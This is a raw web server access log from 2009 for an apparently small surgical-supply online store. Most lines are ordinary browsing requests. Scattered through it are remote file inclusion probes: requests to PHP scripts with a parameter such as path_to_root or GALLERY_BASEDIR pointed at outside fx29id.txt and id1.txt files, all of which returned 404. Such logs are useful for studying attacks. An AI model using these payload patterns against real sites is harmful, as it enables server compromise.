209.59.12.99 - - [29/May/2009:01:52:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
112.175.141.41 - - [29/May/2009:01:52:35 -0400] "GET /logs/access_log.Q109010700%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:01:52:45 -0400] "GET /logs/access_log.Q109010700%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:01:52:53 -0400] "GET /logs/access_log.Q109052200//doceboCms/class/class.dashboard_cms.php?where_framework=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:53:35 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:53:35 -0400] "GET /config.php?path_to_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:53:38 -0400] "GET /logs/config.php?path_to_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.104.17.168 - - [29/May/2009:01:55:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0 HTTP/1.1" 200 50278 "http://www.acesurgical.com/caso4.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:13 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/items/CALCIUMSULFATE_THUMB.JPG HTTP/1.1" 200 2715 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:15 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:36 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0020224D8E51F700205E06F+WSEQ(S0060):1+OUITEM(A0200):5052001 HTTP/1.1" 200 27024 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:36 -0400] "GET /images/items/CALCIUMSULFATE_FULL.JPG HTTP/1.1" 200 3728 "http://www.aceonlinestore.com/cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0020224D8E51F700205E06F+WSEQ(S0060):1+OUITEM(A0200):5052001" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:37 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:46 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
208.104.17.168 - - [29/May/2009:01:55:47 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Tablet PC 1.7; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN OptimizedIE8;ENUS)"
72.18.148.82 - - [29/May/2009:01:56:09 -0400] "GET /logs/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:56:09 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:56:09 -0400] "GET /errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
